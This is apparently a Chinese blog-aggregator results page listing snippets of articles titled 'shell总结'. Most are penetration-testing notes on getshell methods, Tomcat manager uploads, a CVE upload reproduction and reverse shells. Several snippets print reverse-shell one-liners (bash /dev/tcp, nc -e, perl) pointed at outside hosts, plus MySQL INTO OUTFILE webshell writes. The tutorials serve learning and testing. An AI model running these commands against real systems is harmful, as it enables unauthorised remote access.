E-COM-NET
首页
在线工具
Layui镜像站
SUI文档
联系我们
推荐频道
Java
PHP
C++
C
C#
Python
Ruby
go语言
Scala
Servlet
Vue
MySQL
NoSQL
Redis
CSS
Oracle
SQL Server
DB2
HBase
Http
HTML5
Spring
Ajax
Jquery
JavaScript
Json
XML
NodeJs
mybatis
Hibernate
算法
设计模式
shell
数据结构
大数据
JS
消息中间件
正则表达式
Tomcat
SQL
Nginx
Shiro
Maven
Linux
shell总结
HBase详细安装指南
二、HBASE安装1.安装准备2.安装三.基本使用1.hbase
shell总结
前言随着大数据时代的来临,mysql已经无法满足人们的需要,海量数据存储到达了瓶颈,hbase应运而生。
嘎嘎嘎啊哈
·
2024-02-02 06:59
hadoop
hbase
big
data
getshell思路
getshell能干嘛文件上传getshell文件包含getshellsql注入getshell操作系统漏洞getshellRCEget
shell总结
授人以鱼,不如授人以渔getshell能干嘛1.执行终端命令
活着Viva
·
2023-12-14 22:07
渗透小知识
安全
web安全
php
Get
shell总结
文章转发于:https://choge.top/2020/02/23/Getshell%E6%80%BB%E7%BB%93/Getshell分为进管理员后台Getshell和不进后台Getshell,本文主要总结常见进后台Getshell和部分。进后台Getshell管理员后台直接Getshell管理员后台直接上传Getshell,有时候带密码的Webshell连接时容易被waf拦截,可以上传不加
嘎闻旺
·
2023-11-25 04:20
春秋云境靶场CVE-2022-25578漏洞复现(利用htaccess文件进行任意文件上传)
三、CVE-2022-32991漏洞复现1、信息收集2、找上传点3、上传后蚁剑连接get
shell总结
前言此文章只用于学习和反思巩固文件上传漏洞知识,禁止用于做非法攻击。注意靶场是可以练
无名小卒且不会安全的zzyyhh
·
2023-11-19 04:27
web安全
文件上传漏洞
如何在Tomcat后台通过文件上传get
shell总结
(个人学习笔记思路)
本文仅仅用于学习笔记关于渗透测试以及交流经验,请读者遵循《中华人民共和国网络安全法》,本文造成的任何违法行为与本文作者无关。1.用空间测绘或者通过Nmap,goby扫描完成资产搜集之后,发现存在tomcat后门发现可能存在通过tomcat后门上传木马获取服务器权限的漏洞URL栏原地址后输入/manager/html弹出用户名密码登录界面默认用户名和密码都为tomcat2.准备爆破密码(默认密码to
Drecrewice
·
2023-11-16 09:01
渗透测试
tomcat
web安全
反弹
shell总结
反弹shell在介绍反弹链接的时候先说明什么是正向链接:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。而反弹shell是指攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。本质上是网络概念的客户端与服务端的角色反转。反
拓海AE
·
2023-11-15 04:04
反弹shell
web安全
[笔记]深入解析Windows操作系统《番外》windows关键进程解释
文章目录前言一、Linux起源与发展二、什么是shell1.什么是
Shell总结
前言一、Linux起源与发展二、什么是shell1.什么是
Shell总结
以上就是今天要讲的内容,本文仅仅简单介绍了linux
二进制怪兽
·
2023-11-13 09:32
windows
读书笔记
windows
获取webshell的十种方法
本篇文章将如何获取web
shell总结
成为了十种方法,希望广大的企业网络管理员能够通过了解获取webshell的途径,对企业自身进行防范。
weixin_30677475
·
2023-11-02 00:04
sqlmap拿shell
sqlmap5种思路拿
shell总结
①利用dump管理员类的账户后进入进行站点后拿shell或者拿到账户后远程连接进行连接进行udf类提取类拿shell#连接方法sqlmap-d“mysql://admin
goddemon
·
2023-11-01 03:56
bash
开发语言
深大操作系统实验一:并发程序设计
1B.10层子进程嵌套1C.树形创建2.僵尸与孤儿进程2A.孤儿进程2B.僵尸进程3.线程与线程堆栈4.进程线程开销比较5.自定义
shell总结
前言第一个实验就把我干碎了!好大的压力呀。
AkagiSenpai
·
2023-10-27 08:06
操作系统
堆栈
linux
操作系统
进程
线程
PHP-RCE绕过的姿势总结
命令执行空格过滤取反绕过命令分隔符黑名单绕过(比如flag字符)拼接编码单双引号的绕过二、代码执行linux中的直接查看文件内容工具通过命令行写入webshell无数字字母绕过webshell无回显RCE⽆字⺟数字
shell
4v1d
·
2023-10-12 00:09
web
php
开发语言
后端
VulnHub-driftingblues:9
目录简介信息收集漏洞发现与利用权限提升clapton用户Shell缓冲区溢出root用户
Shell总结
简介靶机地址:http://www.vulnhub.com/entry/driftingblues-
江左盟宗主
·
2023-10-10 07:21
VulnHub靶机
VulnHub
driftingblues9
渗透测试实例
反弹
shell总结
反弹
shell总结
讲在前面说的话:反弹
shell总结
nc反弹shell正向shell反向shell正向shell(服务端被攻击):反向shell(客户端被攻击):无nc反弹shellpython反弹shellbash
坦笑&&life
·
2023-08-31 19:49
公开
网络安全
网络安全
web安全
安全
运维
linux
服务器
【Linux】—— 进程程序替换
1️⃣认识execl函数2、程序角度——看图理解(二)替换函数1、命名理解2、函数理解1️⃣execlp2️⃣execv3️⃣execvp4️⃣execle5️⃣execve6️⃣execve(三)自制
shell
起飞的风筝
·
2023-08-16 18:15
Linux
linux
运维
服务器
Linux中profile、bashrc、bash_profile之间的区别和联系
/.bash_profile、~/.bashrc、和~/.bash_login```登录交互式Shell、非登录交互式Shell、登录非交互式Shell、非登录非交互式Shell交互式Shell:登录
Shell
来瓶小白干Oo
·
2023-08-14 14:05
学习
linux
shell
【CTFHUB-WriteUp】pwn技能树-栈溢出-Ret2VDSO
调试分析分析总结漏洞利用及原理可利用漏洞1.栈溢出利用利用思路利用原理2.srand(seed)的不安全引用利用思路利用原理Exploit1.使用栈溢出漏洞GetShell2.使用不安全的seed引用Get
shell
暮诚Mucream
·
2023-06-09 05:16
WriteUp
CTF
PWN
python
c++
shell总结
刚学shell,然后用shell写了一个测试语句,发现对格式要求还是很高的,比如,如果你要比较两个值,a和b,如果你这么写,肯定会报错:[$a==$b]因此你必须在中间加空格:[$a==$b]可怕不?下面是我自己写的一个测试脚本:#!/bin/basha=10b=12if[$a==$b]thenecho"fuck"elseecho"fuck2"fi还有,如果要定义一个变量:a="1"b="2"这样
101之歌
·
2023-04-02 17:28
MySQL之容灾方案解读
目录MySQL容灾方案1.主从半同步复制+手动切换2.主从半同步复制+keepalived自动切换MySQL异地备份策略容灾脚本--
shell总结
MySQL容灾方案容灾方案目前有以下三种容灾方案可供参考
·
2023-03-13 18:28
冯诺依曼体系结构与操作系统
文章目录详解冯诺依曼体系结构与操作系统前言1.简要背景介绍2.五大部件介绍3.细节解释4.举例理解冯诺依曼机中数据走向二、全面认识操作系统1.操作系统的概念2.计算机系统比对银行系统3.深入认识“管理”:5.操作系统存在的目的6.操作系统与
Shell
小熊coder
·
2023-02-28 09:09
操作系统-计算机基础
服务器
网络
linux
Shell总结
学习的初衷在服务器上搞些事情,我意思是查日志~执行helloworld程序vimhi.sh#!/bin/bashecho"hollwworld"chmod+xhi.sh./hi.sh变量常用数据类型字符串数组如何声明变量#注意不能有空格param=strparam='str'#双引号中可以使用变量param="str"#使用变量加$或者${}echo$paramecho${param}字符串api
serpmelon
·
2023-02-04 20:35
【渗透测试漏洞复现】fastjson1.2.24漏洞复现详细过程
文章目录前言漏洞环境搭建漏洞利用复现处理json时发生反序列化JNDI注入反弹
shell总结
前言Fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将JavaBean序列化为
Cgxx
·
2022-12-27 07:25
JAVA安全
java
web安全
内网渗透:nc反弹
shell总结
1、实验环境Kali:192.168.32.132//模拟靶机Windows:192.168.32.1//模拟公网vps2、若靶机上存在nc,获取反向shell:vps攻击机:nc-lvp9999//监听9999端口靶机:nc1.1.1.19999-e/bin/bash//Linux正向连接公网vps1.1.1.1的9999端口nc1.1.1.19999-ec:\windows\system32\
小诗不识月、
·
2022-07-18 17:43
内网渗透
bash
渗透测试
安全
渗透测试-Linux反弹shell
Linux反弹shell前言一、什么是反弹shell二、Linux反弹shell的几种方法1.bash反弹shell反弹shell2.常用的反弹shell命令3.基于编程语言的反弹shell4.加密反弹
shell
炫彩@之星
·
2022-05-23 19:07
渗透测试
安全性测试
web安全
安全
linux
进程控制(Linux)
调用失败的原因进程终止进程退出情况进程等待进程等待的必要性进程等待的方法获取子进程status1、wait2、waitpid方法进程替换替换原理替换函数函数解释总结我们可以综合前面的知识,做一个简易的
shell
雨轩(爵丶迹)
·
2022-02-24 09:50
Linux
linux
服务器
后端
bash
day 49 hbase 安装
文章目录一、HBase1、Master2、RegionServer3、Region二、hbase安装hbase重置三、hbase
shell总结
Iknow,iknow地球另一端有你陪我一、HBaseHBase–HadoopDatabase
韭菜盒子123
·
2021-11-30 19:26
hbase
Get
shell总结
按方式分类:0x01注入getshell:0x02上传getwebshell0x03RCEgetshell0x04包含getwebshell0x05漏洞组合拳getshell0x06系统层getcmdshell0x07钓鱼getcmdshell0x08cms后台getshell0x09红队shell竞争分析0x01注入getshell:一般前提条件:有权限、知道路径MySQLselect0x3c3
大猪蹄汁骨头汤
·
2021-10-08 21:27
web安全
网络安全
详解冯诺依曼体系结构与操作系统
五大部件介绍3.细节解释4.举例理解冯诺依曼机中数据走向二、全面认识操作系统1.操作系统的概念2.计算机系统比对银行系统3.深入认识“管理”:4.库函数和系统调用接口5.操作系统存在的目的6.操作系统与
Shell
LumosJ
·
2021-03-13 18:54
冯诺依曼结构
操作系统
linux
shell
phpmyadmin上传Web
shell总结
目录1.select查询输出webshell(1)创建表并INTOOUTFILE写入一句话(2)select...INTOOUTFILE写入一句话
a阿飞
·
2020-09-15 05:15
网络安全
mysql拿web
shell总结
1、select''intooutfile'/var/www/jumbo.php';2、select''intodumpfile'/var/www/jumbo.php';3、DropTABLEIFEXISTStemp;CreateTABLEtemp(cmdtextNOTNULL);InsertINTOtemp(cmd)VALUES('');Selectcmdfromtempintooutfile'
weixin_33795833
·
2020-08-22 19:34
Hack The Box——SneakyMailer
目录简介信息收集子域名枚举邮件钓鱼上传WebShell权限提升Developer用户ShellLow用户ShellRoot用户
Shell总结
简介这是一台很有意思的靶机,比较像真实的环境,没有什么通用的漏洞
江左盟宗主
·
2020-08-21 01:09
渗透测试
Hack
The
Box
SneakyMailer
HTB
渗透测试实例
Hack The Box——ForwardSlash
目录简介信息收集漏洞发现文件包含漏洞漏洞利用用户chiv的Shell权限提升解密ciphertext用户pain的Shell用户root的
Shell总结
简介这是一台练习CTF的好靶机,靶机创作者有很多提示
江左盟宗主
·
2020-08-21 01:08
渗透测试
LinuxC编程实战My
shell总结
第七章项目Myshell在写Myshell的时候,其实刚开始很多都不会,但是看着书上的解释,同时网上查阅资料,最重要的是问学长如何编写,慢慢的编写myshell也快了起来,虽然有很多的错误和bug,但是大部分在后面都等到了解决。下面是一些我自己在写myshell的时候遇到的坑点:1.首先是命令行参数的解析,这是一开始就容易错的地方,也让我花费了很多时间。2.readline库函数,在使用的时候按下
helloworld19970916
·
2020-08-14 05:25
linux
进程
shell脚本总结
shell总结
shell脚本的本质是shell命令的有序集合建立shell脚本的步骤:建立shell脚本,编写任意多行操作系统命令或shell命令,增加文件的执行权限,结束shell变量shell允许用户建立变量存储数据
wangchaoqun1997
·
2020-08-07 19:21
编程基础零散记录
CTF——Web安全SSI注入
本文首发FreeBuf.COM原本地址——CTF——Web安全SSI注入前言:如何从外部进入主机本文目录SSI注入攻击介绍简单理解SSI语法实验环境信息探测深入挖掘漏洞利用制作web
shell总结
SSI
m0re
·
2020-08-05 19:39
Web
常见反弹
shell总结
1、nc发送方式一:nc-e/bin/sh10.0.0.11234发送方式二:nc10.0.0.11234-c/bin/bash接收:nc-nlvp12342、bash:bash-i>&/dev/tcp/10.0.0.1/80800>&13、perl:perl-e'useSocket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getpro
weixin_45116657
·
2020-08-02 14:38
安全漏洞
【技术分享】linux各种一句话反弹
shell总结
——攻击者指定服务端,受害者主机(无公网IP)主动连接攻击者的服务端程序(CC server),开启一个shell交互,就叫反弹shell。...
反弹shell背景:想要搞清楚这个问题,首先要搞清楚什么是反弹,为什么要反弹。假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面,web服务,ssh,telnet等等,都是正向连接。那么什么情况下正向连接不太好用了呢?1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。它的ip会动态改变
djph26741
·
2020-08-01 12:11
Shell总结
(二)
第一篇我们学习了Shell当中的变量和符号,接下来我们来学习一下Shell当中的语法。语法无非是有几个点,条件判断,循环控制,以及面向过程最重要的一点——函数。1.test和[首先我们来看一下test和[,这两个是有关于条件测试的。test命令和[的作用是一样的,都是用来判断条件是否成立。而对于条件的描述,就需要我们在上一节所说的关系运算符等运算符说明-eq判断是否相等-ne判断是否不相等-le判
宇哲_安菲尔德
·
2020-07-11 16:56
linux
Power
Shell总结
字符串所有用双引号引上的就是字符串任意字符串+任意数据类型,结果为字符串任意数据类型+字符串,结果为前面的数据类型(a+S)的结果为a的数据类型在命令当中-relpace大小写是不敏感的在方法当中.relpace大小写是敏感的在字符串当中-eq通常用来判断两个字符串是否相等[string]::IsNullOrEmpty(str)null""一次可以进行两次判空写脚本的时候很少使用命令,都是用的方法
CZLwlaq
·
2020-07-10 20:40
常用一句话反弹
shell总结
友情链接:https://blog.csdn.net/qq_38684504/article/details/90047213#3.%20python%E8%84%9A%E6%9C%AC%E5%8F%8D%E5%BC%B9shell1.bash直接反弹1.1>bash直接反弹nc-nvlp80801.2>在目标主机上写入bash反弹一句话bash-i>&/dev/tcp/192.168.37.13
weixin_45116657
·
2020-06-29 15:22
安全漏洞
linux各种一句话反弹
shell总结
1 nc开启本地监听发布bash服务1 # nc -lvvp 12345 -t -e /bin/bash 2 常用反弹shell一句话(1) bash 反弹一句话1 # bash -i >& /dev/tcp/192.168.1.123/12345 0>&1 (2) nc 反弹一句话1 # nc 192.168.1.123 12345 -t -e /bin/bash
weixin_34250709
·
2020-06-28 15:00
常用的一句话反弹
shell总结
目录常用的一句话反弹
shell总结
1.bash直接反弹2.python一句话反弹shell3.python脚本反弹shell4.php一句话反弹shell5.php脚本反弹shell6.使用nc命令获取靶机的反弹
橘子女侠
·
2020-06-25 14:04
kali
Linux
渗透测试
Linux下自制简易番茄钟
作者谢恩铭转载请注明出处公众号「程序员联盟」(微信号:ProgrammerLeague)原文:http://www.jianshu.com/p/11c5ef5d8d42内容简介前言测试命令编写
Shell
程序员联盟
·
2020-04-07 15:59
Linux
Shell总结
shell学习总结总览变量1.可用字母数字下划线,不能以数字开头2.不能使用bash关键字3.变量赋值=号两边不能有空格,如age='18'4.变量使用,用符号$age='18'echoageecho${age}如果需要字符串可变量一起使用,可用花括号确认变量,如skill='java'echo"iamgoodat${skill}Script"这里应该是skill作为一个参数加上一个字符串5.可用
bpker
·
2020-02-24 08:28
shell总结
1.使用字符串拼接尤其要用心(我终于感觉自己慢慢把这个坑给填平了):${word}${suffix}2.字符串截取${word[0]}按照空格截取3.shell中运算:$(($a*$b))4.循环:foriin$(seq1100)对比while语句:ip=1#通过修改初值while[$ip!=254];doip=`expr"$ip""+""1"`done5.split-lLineNumberFil
五大RobertWu伍洋
·
2020-02-19 20:15
获取webshell的一些总结
获取web
shell总结
8月6号1.CMS获取Webshell方法:通过百度搜索引擎搜索cms网站程序名称如:phpcms拿webshell,discuz获取webshell(通过一些模板,填ip地址的地方抓包改包
小明都能被取名
·
2019-11-08 05:11
shell总结
文章目录1.)变量和表达式1.运行程序的三种方式:2.选择解释器:3.执行原理:4.shell的命令种类5.变量5.1配置文件加载顺序:6.单双引号:7.Null和初始化变量8.变量类型:全局和局部(local)9.export声明变量10.env临时修改环境变量值,下一条命令就会改回来11.unset删除当前shell中的函数或变量,11.1申明变量的常见方式:12.数值运算13.条件表达式14
京金
·
2019-10-17 10:10
shell
bash.
shell总结
#nanofilename.sh创建文件以.sh结尾。表示脚本文件#!/bin/bash表示使用bash进行进行解释if判断条件;thenecho"yes."elseecho"no."fibash-x逐步执行【方便查看到底能力错了】bash-n测试是否有语法错误多分支的if语句if判断条件;then执行elif判断条件;then执行elif判断条件;then执行else执行fiif如果then然后
梁聪俊
·
2019-09-23 16:18
脚本
shell总结
笔记——关于变量
BASH:主要的优点:命令编修能力;命令与文件补全功能;命令别名设置功能;工作控制、前景背景控制;程序化脚本;万用字符;1、什么是变量?1、让某一个特定的字符串代表不固定的内容。2、变量就是让一组文字或符号等来取代一些设置,或者是一串保留的数据。3、变量的格式:变量名=变量内容(变量名一般设置为大写字母,专业一些)。设置变量的规则:1、变量与变量内容以一个等号“=”来链接;2、等号两边不能直接接空
warrent
·
2019-08-25 12:29
shell环境变量
shell
shell总结
env查看环境变量set显示环境变量(包括局部变量)设置环境变量:export变量名=value变量名=value,export变量名取消变量unset变量名环境变量的初始化过程:先加载/etc/profile全局变量文件在执行/etc/profile.d的目录下的脚本文件运行$HOME/.bash_profile用户环境变量文件---在执行$HOME/.bashrc单引号:里面是什么就输出什么,
mb5c89a5f66503d
·
2019-04-01 20:46
ssss
shell总结
shell编程一shell简介1概念命令解释器2常见shellbashlinux标准shellsh早期shell,较简单cshkshtcshunixshellvi/etc/shellslinux支持的shell3shell脚本例1:#!/bin/bashecho"helloworld!"脚本执行方式:1)赋予执行权限路径执行/root/shell/echo.sh./echo.sh2)bash脚本名
颤抖吧阿威
·
2019-01-17 19:23
shell
linux
运维
上一页
1
2
下一页
按字母分类:
A
B
C
D
E
F
G
H
I
J
K
L
M
N
O
P
Q
R
S
T
U
V
W
X
Y
Z
其他